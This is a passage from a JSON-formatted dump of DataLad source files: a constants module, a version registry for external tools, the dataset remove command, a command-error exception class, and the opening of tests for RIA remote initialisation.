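dss = create_test_dataset('/tmp/demo-hierarchy', spec='2/1')
print('%d dataset(s) created' % len(dss))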
from nothing\nPRE_INIT_COMMIT_SHA = '4b825dc642cb6eb9a060e54bf8d69288fbee4904'\n\n# git/datalad configuration item to provide a token for github\nCONFIG_HUB_TOKEN_FIELD = 'hub.oauthtoken'\nGITHUB_LOGIN_URL = 'https://github.com/login'\nGITHUB_TOKENS_URL = 'https://github.com/settings/tokens'\n\n# format of git-annex adjusted branch names\nADJUSTED_BRANCH_EXPR = re.compile(r'^adjusted/(?P<name>[^(]+)\\(.*\\)$')\n\n# Reserved file names on Windows machines\nRESERVED_NAMES_WIN = {'CON', 'PRN', 'AUX', 'NUL', 'COM1', 'COM2', 'COM3',\n 'COM4', 'COM5', 'COM6', 'COM7', 'COM8', 'COM9', 'LPT1',\n 'LPT2', 'LPT3', 'LPT4', 'LPT5', 'LPT6', 'LPT7', 'LPT8',\n 'LPT9'}\n# Characters that can't be a part of a file name on Windows\nILLEGAL_CHARS_WIN = \"[<>:/\\\\|?*\\\"]|[\\0-\\31]\"\n" }, { "alpha_fraction": 0.5694360733032227, "alphanum_fraction": 0.5745078325271606, "avg_line_length": 33.44827651977539, "blob_id": "44b22ef30b7681463409761a22468619b5fd2389", "content_id": "3abe25cf6cbd929851efa8b7f1755040a237f101", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14985, "license_type": "permissive", "max_line_length": 90, "num_lines": 435, "path": "/datalad/support/external_versions.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Module to help maintain a registry of versions for external modules etc\n\"\"\"\nimport os.path as op\nimport re\nimport sys\nfrom itertools import chain\nfrom os import linesep\n\nfrom looseversion import LooseVersion\n\n# import version helper from config to have only one implementation\n# config needs this to avoid circular imports\nfrom datalad.config import get_git_version as __get_git_version\nfrom datalad.log import lgr\n\nfrom .exceptions import (\n CapturedException,\n CommandError,\n)\n\n__all__ = ['UnknownVersion', 'ExternalVersions', 'external_versions']\n\n\n# To depict an unknown version, which can't be compared by mistake etc\nclass UnknownVersion:\n \"\"\"For internal use\n \"\"\"\n\n def __str__(self):\n return \"UNKNOWN\"\n\n def __cmp__(self, other):\n if other is self:\n return 0\n raise TypeError(\"UNKNOWN version is not comparable\")\n\n\n#\n# Custom handlers\n#\nfrom datalad.cmd import (\n GitWitlessRunner,\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom datalad.support.exceptions import (\n MissingExternalDependency,\n OutdatedExternalDependency,\n)\n\n_runner = WitlessRunner()\n_git_runner = GitWitlessRunner()\n\n\ndef _get_annex_version():\n \"\"\"Return version of available git-annex\"\"\"\n try:\n return _runner.run(\n 'git annex version --raw'.split(),\n protocol=StdOutErrCapture)['stdout']\n except CommandError:\n # fall back on method that could work with older installations\n out = _runner.run(\n ['git', 'annex', 'version'],\n protocol=StdOutErrCapture)\n return out['stdout'].splitlines()[0].split(':')[1].strip()\n\n\ndef _get_git_version():\n \"\"\"Return version of git we use (might be bundled)\"\"\"\n return __get_git_version()\n\n\ndef _get_system_git_version():\n \"\"\"Return version of git available system-wide\n\n Might be different from the one we are 
using, which might be\n bundled with git-annex\n \"\"\"\n return __get_git_version(_runner)\n\n\ndef _get_bundled_git_version():\n \"\"\"Return version of git bundled with git-annex.\n \"\"\"\n path = _git_runner._get_bundled_path()\n if path:\n out = _runner.run(\n [op.join(path, \"git\"), \"version\"],\n protocol=StdOutErrCapture)['stdout']\n # format: git version 2.22.0\n return out.split()[2]\n\n\ndef _get_ssh_version(exe=None):\n \"\"\"Return version of ssh\n\n Annex prior 20170302 was using bundled version, then across all systems\n we used system one if installed, and then switched to the one defined in\n configuration, with system-wide (not default in PATH e.g. from conda)\n \"forced\" on Windows. If no specific executable provided in `exe`, we will\n use the one in configuration\n \"\"\"\n if exe is None:\n from datalad import cfg\n exe = cfg.obtain(\"datalad.ssh.executable\")\n out = _runner.run(\n [exe, '-V'],\n protocol=StdOutErrCapture)\n # apparently spits out to err but I wouldn't trust it blindly\n stdout = out['stdout']\n if out['stderr'].startswith('OpenSSH'):\n stdout = out['stderr']\n match = re.match(\n \"OpenSSH.*_([0-9][0-9]*)\\\\.([0-9][0-9]*)(p([0-9][0-9]*))?\",\n stdout)\n if match:\n return \"{}.{}p{}\".format(\n match.groups()[0],\n match.groups()[1],\n match.groups()[3])\n raise AssertionError(f\"no OpenSSH client found: {stdout}\")\n\n\ndef _get_system_ssh_version():\n \"\"\"Return version of the default on the system (in the PATH) ssh\n \"\"\"\n return _get_ssh_version(\"ssh\")\n\n\ndef _get_system_7z_version():\n \"\"\"Return version of 7-Zip\"\"\"\n out = _runner.run(\n ['7z'],\n protocol=StdOutErrCapture)\n # reporting in variable order across platforms\n # Linux: 7-Zip [64] 16.02\n # Windows: 7-Zip 19.00 (x86)\n pieces = out['stdout'].strip().split(':', maxsplit=1)[0].strip().split()\n for p in pieces:\n # the one with the dot is the version\n if '.' in p:\n return p\n lgr.debug(\"Could not determine version of 7z from stdout. %s\", out)\n\n\ndef get_rsync_version():\n\n # This does intentionally not query the version of rsync itself, but\n # that of the debian package it's installed with. Reason is in gh-7320,\n # which results in the need to detect a patched-by-ubuntu version of rsync\n # and therefore the package version, not the result of `rsync --version`.\n from datalad.utils import (\n get_linux_distribution,\n on_linux,\n )\n if on_linux:\n dist = get_linux_distribution()[0]\n if dist in ['debian', 'ubuntu']:\n out = _runner.run(['apt-cache', 'policy', 'rsync'],\n protocol=StdOutErrCapture)\n for line in out['stdout'].splitlines():\n parts = line.split()\n if parts[0] == 'Installed:':\n ver = LooseVersion(parts[1])\n break\n # If we have a debian package version, use this as rsync version.\n # Otherwise report what `rsync --version` itself has to say.\n if ver:\n return ver\n out = _runner.run(['rsync', '--version'], protocol=StdOutErrCapture)\n # Expected first line:\n # rsync version x protocol version y\n return LooseVersion(out['stdout'].splitlines()[0].split()[2])\n\n\nclass ExternalVersions(object):\n \"\"\"Helper to figure out/use versions of the externals (modules, cmdline tools, etc).\n\n To avoid collision between names of python modules and command line tools,\n prepend names for command line tools with `cmd:`.\n\n It maintains a dictionary of `distuil.version.LooseVersion`s to make\n comparisons easy. Note that even if version string conform the StrictVersion\n \"standard\", LooseVersion will be used. 
If version can't be deduced for the\n external, `UnknownVersion()` is assigned. If external is not present (can't\n be imported, or custom check throws exception), None is returned without\n storing it, so later call will re-evaluate fully.\n \"\"\"\n\n UNKNOWN = UnknownVersion()\n\n _CUSTOM = {\n 'cmd:annex': _get_annex_version,\n 'cmd:git': _get_git_version,\n 'cmd:bundled-git': _get_bundled_git_version,\n 'cmd:system-git': _get_system_git_version,\n 'cmd:ssh': _get_ssh_version,\n 'cmd:system-ssh': _get_system_ssh_version,\n 'cmd:7z': _get_system_7z_version,\n }\n # ad-hoc hardcoded map for relevant Python packages which do not provide\n # __version__ and are shipped by a differently named pypi package\n _PYTHON_PACKAGES = { # Python package -> distribution package\n 'github': 'pygithub',\n }\n _INTERESTING = (\n 'annexremote',\n 'platformdirs',\n 'boto',\n 'git',\n 'gitdb',\n 'humanize',\n 'iso8601',\n 'keyring',\n 'keyrings.alt',\n 'msgpack',\n 'patool',\n 'cmd:7z',\n 'requests',\n 'scrapy',\n )\n\n def __init__(self):\n self._versions = {}\n self.CUSTOM = self._CUSTOM.copy()\n self.INTERESTING = list(self._INTERESTING) # make mutable for `add`\n\n @classmethod\n def _deduce_version(klass, value):\n version = None\n\n # see if it is something containing a version\n for attr in ('__version__', 'version'):\n if hasattr(value, attr):\n version = getattr(value, attr)\n break\n\n # try importlib.metadata\n if version is None and hasattr(value, '__name__'):\n pkg_name = klass._PYTHON_PACKAGES.get(value.__name__, value.__name__)\n try:\n if sys.version_info < (3, 10):\n import importlib_metadata as im\n else:\n import importlib.metadata as im\n\n version = im.version(pkg_name)\n except Exception:\n pass\n\n # assume that value is the version\n if version is None:\n version = value\n\n # do type analysis\n if isinstance(version, (tuple, list)):\n # Generate string representation\n version = \".\".join(str(x) for x in version)\n elif isinstance(version, bytes):\n version = version.decode()\n elif isinstance(version, str):\n pass\n else:\n version = None\n\n if version:\n return LooseVersion(version)\n else:\n return klass.UNKNOWN\n\n def __getitem__(self, module):\n # when ran straight in its source code -- fails to discover nipy's version.. 
TODO\n #if module == 'nipy':\n # import pdb; pdb.set_trace()\n if not isinstance(module, str):\n modname = module.__name__\n else:\n modname = module\n module = None\n\n lgr.log(5, \"Requested to provide version for %s\", modname)\n # Early returns None so we do not store prev result for them\n # and allow users to install things at run time, so later check\n # doesn't pick it up from the _versions\n if modname not in self._versions:\n version = None # by default -- not present\n if modname in self.CUSTOM:\n try:\n version = self.CUSTOM[modname]()\n version = self._deduce_version(version)\n except Exception as exc:\n lgr.debug(\"Failed to deduce version of %s due to %s\"\n % (modname, CapturedException(exc)))\n return None\n else:\n if module is None:\n if modname not in sys.modules:\n try:\n module = __import__(modname)\n except ImportError:\n lgr.debug(\"Module %s seems to be not present\", modname)\n return None\n except Exception as exc:\n lgr.warning(\"Failed to import module %s due to %s\",\n modname, CapturedException(exc))\n return None\n else:\n module = sys.modules[modname]\n if module:\n version = self._deduce_version(module)\n self._versions[modname] = version\n\n return self._versions.get(modname, self.UNKNOWN)\n\n def keys(self, query=False):\n \"\"\"Return names of the known modules\n\n Parameters\n ----------\n query: bool, optional\n If True, we will first query all CUSTOM and INTERESTING entries\n to make sure we have them known.\n \"\"\"\n if query:\n [self[k] for k in chain(self.CUSTOM, self.INTERESTING)]\n return self._versions.keys()\n\n def __contains__(self, item):\n return bool(self[item])\n\n def add(self, name, func=None):\n \"\"\"Add a version checker\n\n This method allows third-party libraries to define additional checks.\n It will not add `name` if already exists. If `name` exists and `func`\n is different - it will override with a new `func`. Added entries will\n be included in the output of `dumps(query=True)`.\n\n Parameters\n ----------\n name: str\n Name of the check (usually a name of the Python module, or an\n external command prefixed with \"cmd:\")\n func: callable, optional\n Function to be called to obtain version information. This should be\n defined when checking the version of something that is not a Python\n module or when this class's method for determining the version of a\n Python module isn't sufficient.\n \"\"\"\n if func:\n func_existing = self.CUSTOM.get(name, None)\n was_known = False\n if func_existing and func_existing is not func:\n lgr.debug(\n \"Adding a new custom version checker %s for %s, \"\n \"old one: %s\", func, name, func_existing)\n was_known = name in self._versions\n self.CUSTOM[name] = func\n if was_known:\n # pop and query it again right away to possibly replace with a new value\n self._versions.pop(name)\n _ = self[name]\n elif name not in self.INTERESTING:\n self.INTERESTING.append(name)\n\n @property\n def versions(self):\n \"\"\"Return dictionary (copy) of versions\"\"\"\n return self._versions.copy()\n\n def dumps(self, indent=None, preamble=\"Versions:\", query=False):\n \"\"\"Return listing of versions as a string\n\n Parameters\n ----------\n indent: bool or str, optional\n If set would instruct on how to indent entries (if just True, ' '\n is used). 
Otherwise returned in a single line\n preamble: str, optional\n What preamble to the listing to use\n query : bool, optional\n To query for versions of all \"registered\" custom externals, so to\n get those which weren't queried for yet\n \"\"\"\n if indent and (indent is True):\n indent = ' '\n items = [\"%s=%s\" % (k, self._versions[k]) for k in sorted(self.keys(query=query))]\n out = \"%s\" % preamble if preamble else ''\n if indent is not None:\n if preamble:\n preamble += linesep\n indent = ' ' if indent is True else str(indent)\n out += (linesep + indent).join(items) + linesep\n else:\n out += \" \" + ' '.join(items)\n return out\n\n def check(self, name, min_version=None, msg=\"\"):\n \"\"\"Check if an external (optionally of specified min version) present\n\n Parameters\n ----------\n name: str\n Name of the external (typically a Python module)\n min_version: str or version, optional\n Minimal version to satisfy\n msg: str, optional\n An additional message to include into the exception message\n\n Raises\n ------\n MissingExternalDependency\n if the external is completely missing\n OutdatedExternalDependency\n if the external is present but does not satisfy the min_version\n \"\"\"\n ver_present = self[name]\n if ver_present is None:\n raise MissingExternalDependency(\n name, ver=min_version, msg=msg)\n elif min_version and ver_present < min_version:\n raise OutdatedExternalDependency(\n name, ver=min_version, ver_present=ver_present, msg=msg)\n\n\nexternal_versions = ExternalVersions()\n" }, { "alpha_fraction": 0.5751628279685974, "alphanum_fraction": 0.5761577486991882, "avg_line_length": 39.350364685058594, "blob_id": "9ce746101ad62767df97f1f524be18e68daccc32", "content_id": "578cb90328f559385cea755e52617c1bc16c31d2", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11056, "license_type": "permissive", "max_line_length": 114, "num_lines": 274, "path": "/datalad/local/remove.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for removing dataset content\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom os.path import lexists\nimport warnings\n\nfrom datalad.core.local.save import Save\nfrom datalad.core.local.status import get_paths_by_ds\nfrom datalad.distributed.drop import Drop\nfrom datalad.distribution.dataset import (\n datasetmethod,\n require_dataset,\n EnsureDataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n jobs_opt,\n save_message_opt,\n)\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n ensure_list,\n rmtree,\n)\n\nlgr = logging.getLogger('datalad.local.remove')\n\n\n@build_doc\nclass Remove(Interface):\n \"\"\"Remove components from datasets\n\n Removing \"unlinks\" a dataset component, such as a file or subdataset, from\n a dataset. 
Such a removal advances the state of a dataset, just like adding\n new content. A remove operation can be undone, by restoring a previous\n dataset state, but might require re-obtaining file content and subdatasets\n from remote locations.\n\n This command relies on the 'drop' command for safe operation. By default,\n only file content from datasets which will be uninstalled as part of\n a removal will be dropped. Otherwise file content is retained, such that\n restoring a previous version also immediately restores file content access,\n just as it is the case for files directly committed to Git. This default\n behavior can be changed to always drop content prior removal, for cases\n where a minimal storage footprint for local datasets installations is\n desirable.\n\n Removing a dataset component is always a recursive operation. Removing a\n directory, removes all content underneath the directory too. If\n subdatasets are located under a to-be-removed path, they will be\n uninstalled entirely, and all their content dropped. If any subdataset\n can not be uninstalled safely, the remove operation will fail and halt.\n\n .. versionchanged:: 0.16\n More in-depth and comprehensive safety-checks are now performed by\n default.\n The ``if_dirty||--if-dirty`` argument is ignored, will be removed in\n a future release, and can be removed for a safe-by-default behavior. For\n other cases consider the ``reckless||--reckless`` argument.\n The ``save||--save`` argument is ignored and will be removed in a future\n release, a dataset modification is now always saved. Consider save's\n ``amend||--amend`` argument for post-remove fix-ups.\n The ``recursive||--recursive`` argument is ignored, and will be removed\n in a future release. Removal operations are always recursive, and the\n parameter can be stripped from calls for a safe-by-default behavior.\n\n .. deprecated:: 0.16\n The ``check||--check`` argument will be removed in a future release.\n It needs to be replaced with ``reckless||--reckless``.\n \"\"\"\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n metavar=\"DATASET\",\n doc=\"\"\"specify the dataset to perform remove from.\n If no dataset is given, the current working directory is used\n as operation context\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"path of a dataset or dataset component to be removed\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n drop=Parameter(\n args=(\"--drop\",),\n doc=\"\"\"which dataset components to drop prior removal. This\n parameter is passed on to the underlying drop operation as\n its 'what' argument.\"\"\",\n # we must not offer a 'nothing' which would bypass\n # the `drop()` call. 
The implementation completely\n # relies on `drop()` for all safety measures.\n # instead `drop(reckless=kill)` must be used to fast-kill\n # things\n constraints=EnsureChoice('datasets', 'all')),\n jobs=jobs_opt,\n message=save_message_opt,\n # XXX deprecate!\n save=Parameter(\n args=(\"--nosave\",),\n dest='save',\n action=\"store_false\",\n doc=\"\"\"DEPRECATED and IGNORED; use `save --amend` instead\"\"\"),\n recursive=Parameter(\n args=(\"--recursive\", '-r',),\n action='store_const',\n const=None,\n doc=\"\"\"DEPRECATED and IGNORED: removal is always a recursive\n operation\"\"\"),\n )\n # inherit some from Drop\n # if_dirty and check as deprecated\n for p in ('reckless', 'if_dirty', 'check',):\n _params_[p] = Drop._params_[p]\n\n _examples_ = [\n dict(text=\"Permanently remove a subdataset (and all further subdatasets contained in it) from a dataset\",\n code_py=\"remove(dataset='path/to/dataset', path='path/to/subds')\",\n code_cmd=\"datalad remove -d <path/to/dataset> <path/to/subds>\"),\n dict(text=\"Permanently remove a superdataset (with all subdatasets) from the filesystem\",\n code_py=\"remove(dataset='path/to/dataset')\",\n code_cmd=\"datalad remove -d <path/to/dataset>\"),\n dict(text=\"DANGER-ZONE: Fast wipe-out a dataset and all its subdataset, bypassing all safety checks\",\n code_py=\"remove(dataset='path/to/dataset', reckless='kill')\",\n code_cmd=\"datalad remove -d <path/to/dataset> --reckless kill\"),\n ]\n\n @staticmethod\n @datasetmethod(name='remove')\n @eval_results\n def __call__(\n path=None,\n *,\n dataset=None,\n drop='datasets',\n reckless=None,\n message=None,\n jobs=None,\n # deprecated below\n recursive=None,\n check=None,\n save=None,\n if_dirty=None):\n\n # deprecate checks\n if if_dirty is not None:\n warnings.warn(\n \"The `if_dirty` argument of `datalad remove` is ignored, \"\n \"it can be removed for a safe-by-default behavior. For \"\n \"other cases consider the `reckless` argument.\",\n DeprecationWarning)\n\n if save is not None:\n warnings.warn(\n \"The `save` argument of `datalad remove` is ignored. \"\n \"A dataset modification is always saved. Consider \"\n \"`save --amend` if post-remove fix-ups are needed.\",\n DeprecationWarning)\n\n if recursive is not None:\n warnings.warn(\n \"The `recursive` argument of `datalad remove` is ignored. \"\n \"Removal operations are always recursive, and the parameter \"\n \"can be stripped from calls for a safe-by-default behavior. 
\",\n DeprecationWarning)\n\n if check is not None:\n warnings.warn(\n \"The `check` argument of `datalad remove` is deprecated, \"\n \"use the `reckless` argument instead.\",\n DeprecationWarning)\n\n if check is False:\n if reckless is not None:\n raise ValueError(\n 'Must not use deprecated `check` argument, and new '\n '`reckless` argument together with `datalad remove`.')\n reckless = 'availability'\n\n refds = require_dataset(dataset, check_installed=True,\n purpose='remove')\n # same path resolution that drop will do\n paths_by_ds, errors = get_paths_by_ds(\n refds, dataset, ensure_list(path),\n # super-mode will readily tell us which datasets to\n # save as the end\n subdsroot_mode='super')\n\n drop_success = True\n for res in Drop.__call__(\n dataset=dataset,\n path=path,\n what=drop,\n reckless=reckless,\n recursive=True,\n recursion_limit=None,\n jobs=jobs,\n result_xfm=None,\n return_type='generator',\n result_renderer='disabled',\n # delegate error handling here\n on_failure='ignore'):\n if res.get('status') not in ('ok', 'notneeded'):\n drop_success = False\n yield res\n\n if not drop_success:\n # there will be 'rm -rf' below, so play safe\n lgr.debug('Observed drop failure, will not attempt remove')\n return\n\n for dpath, paths in paths_by_ds.items():\n for delpath in ([dpath] if paths is None else paths):\n if lexists(str(delpath)):\n # here we still have something around on the\n # filesystem. There is no need to fiddle with\n # Git, just wipe it out. A later save() will\n # act on it properly\n if delpath.is_dir():\n lgr.debug('Remove directory: %s', delpath)\n rmtree(delpath)\n # cannot use .exists() must forsee dead symlinks\n else:\n lgr.debug('Remove file: %s', delpath)\n delpath.unlink()\n continue\n else:\n # if we get here, there is nothing on the file system\n # anymore at this path. Either because the parent\n # dataset vanished already, or because we dropped a\n # dataset. `save()` will properly unregistered\n # from the parents at the end. 
nothing else to do\n pass\n\n if not refds.is_installed():\n # we already dropped the whole thing\n return\n\n for res in Save.__call__(\n dataset=dataset,\n path=path,\n # we might have removed the reference dataset by now, recheck\n message=message if message else '[DATALAD] removed content',\n return_type='generator',\n result_renderer='disabled',\n result_xfm=None,\n result_filter=None,\n on_failure='ignore'):\n if res.get('action') == 'delete':\n # normalize to previous remove results\n res['action'] = 'remove'\n yield res\n" }, { "alpha_fraction": 0.4883190989494324, "alphanum_fraction": 0.4903133809566498, "avg_line_length": 28.74576187133789, "blob_id": "7409b52b6840f910fb361b2cc85ed8e81e012d5d", "content_id": "232cf3ac54d54c4f03ffc8d9f47ba2e6586e64ca", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3510, "license_type": "permissive", "max_line_length": 87, "num_lines": 118, "path": "/datalad/runner/exception.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Exception raise on a failed runner command execution\n\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport os\nfrom collections import Counter\nfrom typing import (\n Any,\n Optional,\n)\n\nlgr = logging.getLogger('datalad.runner.exception')\n\n\nclass CommandError(RuntimeError):\n \"\"\"Thrown if a command call fails.\n\n Note: Subclasses should override `to_str` rather than `__str__` because\n `to_str` is called directly in datalad.cli.main.\n \"\"\"\n\n def __init__(\n self,\n cmd: str | list[str] = \"\",\n msg: str = \"\",\n code: Optional[int] = None,\n stdout: str | bytes = \"\",\n stderr: str | bytes = \"\",\n cwd: str | os.PathLike | None = None,\n **kwargs: Any,\n ) -> None:\n RuntimeError.__init__(self, msg)\n self.cmd = cmd\n self.msg = msg\n self.code = code\n self.stdout = stdout\n self.stderr = stderr\n self.cwd = cwd\n self.kwargs = kwargs\n\n def to_str(self, include_output: bool = True) -> str:\n from datalad.utils import (\n ensure_unicode,\n join_cmdline,\n )\n to_str = \"{}: \".format(self.__class__.__name__)\n cmd = self.cmd\n if cmd:\n to_str += \"'{}'\".format(\n # go for a compact, normal looking, properly quoted\n # command rendering if the command is in list form\n join_cmdline(cmd) if isinstance(cmd, list) else cmd\n )\n if self.code:\n to_str += \" failed with exitcode {}\".format(self.code)\n if self.cwd:\n # only if not under standard PWD\n to_str += \" under {}\".format(self.cwd)\n if self.msg:\n # typically a command error has no specific idea\n to_str += \" [{}]\".format(ensure_unicode(self.msg))\n\n if self.kwargs:\n to_str += \" [info keys: {}]\".format(\n ', '.join(self.kwargs.keys()))\n\n if 'stdout_json' in self.kwargs:\n to_str += _format_json_error_messages(\n self.kwargs['stdout_json'])\n\n if not include_output:\n return to_str\n\n if self.stdout:\n to_str += \" [out: '{}']\".format(ensure_unicode(self.stdout).strip())\n if self.stderr:\n to_str += \" [err: '{}']\".format(ensure_unicode(self.stderr).strip())\n\n return to_str\n\n def __str__(self) -> str:\n return 
self.to_str()\n\n\ndef _format_json_error_messages(recs: list[dict]) -> str:\n # there could be many, condense\n msgs: Counter[str] = Counter()\n for r in recs:\n if r.get('success'):\n continue\n msg = '{}{}'.format(\n ' {}\\n'.format(r['note']) if r.get('note') else '',\n '\\n'.join(r.get('error-messages', [])),\n )\n if 'file' in r or 'key' in r:\n msgs[msg] += 1\n\n if not msgs:\n return ''\n\n return '\\n>{}'.format(\n '\\n> '.join(\n '{}{}'.format(\n m,\n ' [{} times]'.format(n) if n > 1 else '',\n )\n for m, n in msgs.items()\n )\n )\n" }, { "alpha_fraction": 0.6040116548538208, "alphanum_fraction": 0.6130701899528503, "avg_line_length": 33.0501823425293, "blob_id": "1e22926c9c2ae9fdf1e87288684b24986e3c390e", "content_id": "932711d0c498ea79fee872f8f6ccc574fcdb3eb3", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27819, "license_type": "permissive", "max_line_length": 146, "num_lines": 817, "path": "/datalad/distributed/tests/test_ria_basics.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nimport stat\n\nfrom datalad.api import (\n Dataset,\n clone,\n create_sibling_ria,\n)\nfrom datalad.cmd import NoCapture\nfrom datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n get_layout_locations,\n)\nfrom datalad.distributed.ora_remote import (\n LocalIO,\n SSHRemoteIO,\n _sanitize_key,\n)\nfrom datalad.distributed.tests.ria_utils import (\n common_init_opts,\n get_all_files,\n populate_dataset,\n)\nfrom datalad.support.exceptions import (\n CommandError,\n IncompleteResultsError,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_false,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_status,\n assert_true,\n has_symlink_capability,\n known_failure_windows,\n serve_path_via_http,\n skip_if_adjusted_branch,\n skip_if_no_network,\n skip_if_root,\n skip_ssh,\n skip_wo_symlink_capability,\n slow,\n swallow_logs,\n turtle,\n with_tempfile,\n)\nfrom datalad.utils import Path\n\n# Note, that exceptions to test for are generally CommandError since we are\n# talking to the special remote via annex.\n\n\n@with_tempfile\n@with_tempfile\ndef _test_initremote_basic(url, io, store, ds_path, link):\n\n ds_path = Path(ds_path)\n store = Path(store)\n link = Path(link)\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n\n init_opts = common_init_opts + ['url={}'.format(url)]\n\n # fails on non-existing storage location\n assert_raises(CommandError,\n ds.repo.init_remote, 'ria-remote', options=init_opts)\n # Doesn't actually create a remote if it fails\n assert_not_in('ria-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n\n # fails on non-RIA URL\n assert_raises(CommandError, ds.repo.init_remote, 'ria-remote',\n options=common_init_opts + ['url={}'.format(store.as_uri())]\n )\n # Doesn't actually create a remote if it fails\n assert_not_in('ria-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n\n # set up store:\n create_store(io, store, 
'1')\n # still fails, since ds isn't setup in the store\n assert_raises(CommandError,\n ds.repo.init_remote, 'ria-remote', options=init_opts)\n # Doesn't actually create a remote if it fails\n assert_not_in('ria-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n # set up the dataset as well\n create_ds_in_store(io, store, ds.id, '2', '1')\n # now should work\n ds.repo.init_remote('ria-remote', options=init_opts)\n assert_in('ria-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n assert_repo_status(ds.path)\n # git-annex:remote.log should have:\n # - url\n # - common_init_opts\n # - archive_id (which equals ds id)\n remote_log = ds.repo.call_git(['cat-file', 'blob', 'git-annex:remote.log'],\n read_only=True)\n assert_in(\"url={}\".format(url), remote_log)\n [assert_in(c, remote_log) for c in common_init_opts]\n assert_in(\"archive-id={}\".format(ds.id), remote_log)\n\n # re-configure with invalid URL should fail:\n assert_raises(\n CommandError,\n ds.repo.call_annex,\n ['enableremote', 'ria-remote'] + common_init_opts + [\n 'url=ria+file:///non-existing'])\n # but re-configure with valid URL should work\n if has_symlink_capability():\n link.symlink_to(store)\n new_url = 'ria+{}'.format(link.as_uri())\n ds.repo.call_annex(\n ['enableremote', 'ria-remote'] + common_init_opts + [\n 'url={}'.format(new_url)])\n # git-annex:remote.log should have:\n # - url\n # - common_init_opts\n # - archive_id (which equals ds id)\n remote_log = ds.repo.call_git(['cat-file', 'blob',\n 'git-annex:remote.log'],\n read_only=True)\n assert_in(\"url={}\".format(new_url), remote_log)\n [assert_in(c, remote_log) for c in common_init_opts]\n assert_in(\"archive-id={}\".format(ds.id), remote_log)\n\n # we can deal with --sameas, which leads to a special remote not having a\n # 'name' property, but only a 'sameas-name'. 
See gh-4259\n try:\n ds.repo.init_remote('ora2',\n options=init_opts + ['--sameas', 'ria-remote'])\n except CommandError as e:\n if 'Invalid option `--sameas' in e.stderr:\n # annex too old - doesn't know --sameas\n pass\n else:\n raise\n # TODO: - check output of failures to verify it's failing the right way\n # - might require to run initremote directly to get the output\n\n\n# TODO: Skipped due to gh-4436\n@known_failure_windows\n@skip_ssh\n@with_tempfile\ndef test_initremote_basic_sshurl(storepath=None):\n _test_initremote_basic(\n 'ria+ssh://datalad-test{}'.format(Path(storepath).as_posix()), \\\n SSHRemoteIO('datalad-test'), \\\n storepath,\n )\n\n\n# ora remote cannot handle windows file:// URLs\n@known_failure_windows\n@with_tempfile\ndef test_initremote_basic_fileurl(storepath=None):\n _test_initremote_basic(\n \"ria+{}\".format(Path(storepath).as_uri()),\n LocalIO(),\n storepath,\n )\n\n\n# https://github.com/datalad/datalad/issues/6160\n@known_failure_windows\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_initremote_basic_httpurl(storepath=None, storeurl=None):\n _test_initremote_basic(\n 